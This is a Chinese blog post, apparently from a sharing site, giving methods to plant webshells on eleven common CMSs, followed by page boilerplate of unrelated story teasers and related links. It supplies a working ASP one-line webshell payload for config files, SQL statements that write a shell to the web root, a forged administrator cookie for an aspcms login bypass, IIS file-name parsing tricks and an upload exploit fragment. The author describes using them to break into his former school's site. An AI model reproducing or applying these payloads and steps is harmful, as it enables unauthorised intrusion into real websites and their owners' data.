11中常见CMS

目录:

0×1 良精南方

0×2 phpweb

0×3 科讯

0×4 dedecms

0×5 尘缘雅境

0×6 aspcms

0×7 74cms

0×8 phpcms

0×9 shopex

0×10 老Y文章管理系统

0×11 ecshop

一、良精南方

对于良精南方我个人比较喜欢配置文件插一句话

配置中在插入

”%><%Eval(Request(chr(112)))%><%’

复制代码

如图:

菜刀连接:/inc/config.asp 密码p

引号也要带上,不然会插爆,你们懂的

第二种方法就是双文件上传,前段时间就遇到一个奇葩站点,/inc没有写入权限,但是可以上传文件

果断利用前两天论坛找到的那个双文件上传exp


BODY{

BACKGROUND-COLOR: #E1F4EE;

font-size:9pt

}

.tx1 { height: 20px;font-size: 9pt; border: 1px solid; border-color: #000000; color: #0000FF}

–>

function check()

{

var strFileName=document.form1.FileName.value;

if (strFileName==”")

{

alert(“请选择要上传的文件”);

document.form1.FileName.focus();

return false;

}

}

复制代码

里面的网址自己改下,貌似前台注册也有exp不过我没收集,呵呵

这个exp的用法就是前面的框传图片文件后面的框传cer

cer会被解析成asp,大家都懂的

二、phpweb

这种主要来说就是利用上传漏洞+iis解析漏洞

exp昨天才发了,这里就贴链接进去吧

点我查看phpweb拿shell exp

三、科讯

我个人比较喜欢的就是执行sql语句拿shell

直接后台处执行语句以下sql语句

(1) create table cmd (a varchar(50))

(2) insert into cmd (a) values (‘一句话马’)

(3) select * into [a] in ‘网站根目录1.asa;x.xls’ ‘excel 4.0;’ from cmd

(4) drop table cmd

我来解释下,四句sql语句大概的意思就是

(1)创建cmd表

(2)cmd表写入一句话

(3)把cmd表中的内容导出

(4)删除cmd表

至于科讯的网站根目录绝对路径可以在数据库备份中找到

好像数据库备份可以burp抓包修改备份名神马的大家都懂的我没试过的说

四、dedecms

本来是不想写这个的,大家都知道这个的啦,再加上前段时间的变量覆盖漏洞现在看起来有些鸡肋,不过对于低版本的还是挺管用,这个好像是最简单的了

直接在后台文件管理中上传一个php马儿

五、尘缘雅境

这个在前台门户看到的,一开始我还没认出来,我母校用的就是这个系统

只是后台页面的名字改了

这个虽然很少人用了,但是毕竟我遇到了也知道了方法当然是分享啦

这个有前台注册用户,后台可以直接管理员登录入口登录你注册的用户,不过现在基本都关闭了注册

记得我母校也关闭了,用那个法克门户中cms渗透里面那个exp我用了是失败了的说

我拿下母校的方法是前台的忘记密码找回密码,我们学校的管理员比较笨,问题和答案都是admin顺利撸进了后台

这个后台拿shell可以利用远程文件保存

也可以和良精南方一样插入一句话”%><%Eval(Request(chr(112)))%><%’

继续菜刀连接inc/config.asp

ps:发表这篇文章前我把源码下载下来后在后台撸了半天想明白的插一句话,也成功干掉了我的母校

六、aspcms

这个aspcms拿shell也挺简单的,这里我就简单介绍下

在后台登录处可以cookie欺骗

cookies:username=admin; ASPSESSIONIDAABTAACS=IHDJOJACOPKFEEENHHMJHKLG; LanguageAlias=cn; LanguagePath=%2F; languageID=1; adminId=1; adminName=admin; groupMenu=1%2C+70%2C+10%2C+11%2C+12%2C+13%2C+14%2C+20%2C+68%2C+15%2C+16%2C+17%2C+18%2C+3%2C+25%2C+57%2C+58%2C+59%2C+2%2C+21%2C+22%2C+23%2C+24%2C+4%2C+27%2C+28%2C+29%2C+5%2C+49%2C+52%2C+56%2C+30%2C+51%2C+53%2C+54%2C+55%2C+188%2C+67%2C+63%2C+190%2C+184%2C+86%2C+6%2C+32%2C+33%2C+34%2C+8%2C+37%2C+183%2C+38%2C+60%2C+9; GroupName=%B3%AC%BC%B6%B9%DC%C0%ED%D4%B1%D7%E9

复制代码

把后台登陆中的login.asp改成index.asp直接进入后台

拿shell直接在模板哪里上传个马儿可自己命名解析漏洞神马的你懂的

如果是非iis6.0环境也可以插入一句话,这里我还是给出链接吧

点我查看iis非6.0后台拿shell

七、74cms

这个我没看明白,各位大大自己去理解

点我查看74cms后台拿shell

八、phpcms

这个好像也有sql执行功能,太久没撸这种站了,忘记了有木有的说

直接编辑模板然后修改首页模板插一句话进去

生成html选择否然后下面有个框选择生成文件扩展名点php保存后直接连接首页文件

九、shopex

和aspcms一样,直接生成模板插入一句话,生成出来的是.html

我们可以命名为AV.asp;av

生成出来就是AV.asp;av.html

各种菜刀连接

十、老Y文章管理系统

以前劫持一位黑阔的博客时C段下就几个站点,其中一个就是老Y

可以调用编辑器就直接修改编辑器

不能调用就在数据库备份处burp抓包把.mdb改成.asp

十一、ecshop

这个可以执行sql语句拿shell也可以数据库备份,sql语句上面讲了.

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
  • 序言:七十年代末,一起剥皮案震惊了整个滨河市,随后出现的几起案子,更是在滨河造成了极大的恐慌,老刑警刘岩,带你破解...
    沈念sama阅读 212,222评论 6 493
  • 序言:滨河连续发生了三起死亡事件,死亡现场离奇诡异,居然都是意外死亡,警方通过查阅死者的电脑和手机,发现死者居然都...
    沈念sama阅读 90,455评论 3 385
  • 文/潘晓璐 我一进店门,熙熙楼的掌柜王于贵愁眉苦脸地迎上来,“玉大人,你说我怎么就摊上这事。” “怎么了?”我有些...
    开封第一讲书人阅读 157,720评论 0 348
  • 文/不坏的土叔 我叫张陵,是天一观的道长。 经常有香客问我,道长,这世上最难降的妖魔是什么? 我笑而不...
    开封第一讲书人阅读 56,568评论 1 284
  • 正文 为了忘掉前任,我火速办了婚礼,结果婚礼上,老公的妹妹穿的比我还像新娘。我一直安慰自己,他们只是感情好,可当我...
    茶点故事阅读 65,696评论 6 386
  • 文/花漫 我一把揭开白布。 她就那样静静地躺着,像睡着了一般。 火红的嫁衣衬着肌肤如雪。 梳的纹丝不乱的头发上,一...
    开封第一讲书人阅读 49,879评论 1 290
  • 那天,我揣着相机与录音,去河边找鬼。 笑死,一个胖子当着我的面吹牛,可吹牛的内容都是我干的。 我是一名探鬼主播,决...
    沈念sama阅读 39,028评论 3 409
  • 文/苍兰香墨 我猛地睁开眼,长吁一口气:“原来是场噩梦啊……” “哼!你这毒妇竟也来了?” 一声冷哼从身侧响起,我...
    开封第一讲书人阅读 37,773评论 0 268
  • 序言:老挝万荣一对情侣失踪,失踪者是张志新(化名)和其女友刘颖,没想到半个月后,有当地人在树林里发现了一具尸体,经...
    沈念sama阅读 44,220评论 1 303
  • 正文 独居荒郊野岭守林人离奇死亡,尸身上长有42处带血的脓包…… 初始之章·张勋 以下内容为张勋视角 年9月15日...
    茶点故事阅读 36,550评论 2 327
  • 正文 我和宋清朗相恋三年,在试婚纱的时候发现自己被绿了。 大学时的朋友给我发了我未婚夫和他白月光在一起吃饭的照片。...
    茶点故事阅读 38,697评论 1 341
  • 序言:一个原本活蹦乱跳的男人离奇死亡,死状恐怖,灵堂内的尸体忽然破棺而出,到底是诈尸还是另有隐情,我是刑警宁泽,带...
    沈念sama阅读 34,360评论 4 332
  • 正文 年R本政府宣布,位于F岛的核电站,受9级特大地震影响,放射性物质发生泄漏。R本人自食恶果不足惜,却给世界环境...
    茶点故事阅读 40,002评论 3 315
  • 文/蒙蒙 一、第九天 我趴在偏房一处隐蔽的房顶上张望。 院中可真热闹,春花似锦、人声如沸。这庄子的主人今日做“春日...
    开封第一讲书人阅读 30,782评论 0 21
  • 文/苍兰香墨 我抬头看了看天上的太阳。三九已至,却和暖如春,着一层夹袄步出监牢的瞬间,已是汗流浃背。 一阵脚步声响...
    开封第一讲书人阅读 32,010评论 1 266
  • 我被黑心中介骗来泰国打工, 没想到刚下飞机就差点儿被人妖公主榨干…… 1. 我叫王不留,地道东北人。 一个月前我还...
    沈念sama阅读 46,433评论 2 360
  • 正文 我出身青楼,却偏偏与公主长得像,于是被迫代替她去往敌国和亲。 传闻我的和亲对象是个残疾皇子,可洞房花烛夜当晚...
    茶点故事阅读 43,587评论 2 350

推荐阅读更多精彩内容

  • 一套实用的渗透测试岗位面试题,你会吗? 1.拿到一个待检测的站,你觉得应该先做什么? 收集信息 whois、网站源...
    g0阅读 4,818评论 0 9
  • (源自摘抄整理)https://www.91ri.org/11494.html Webshell实现与隐藏探究 一...
    JackyTsuuuy阅读 20,740评论 2 13
  • [SQL注入攻击] SQL注入攻击是黑客对数据库进行攻击的常用手段之一。随着B/S模式应用开发的发展,使用这种模式...
    James黄杰阅读 2,645评论 0 30
  • 注入攻击的分类 1.没有正确过滤转义字符 在用户的输入没有为转义字符过滤时,就会发生这种形式的注入式攻击,它会被传...
    查无此人asdasd阅读 1,603评论 0 5
  • 姓名:于川皓 学号:16140210089 转载自:https://baike.baidu.com/item/sq...
    道无涯_cc76阅读 1,934评论 0 2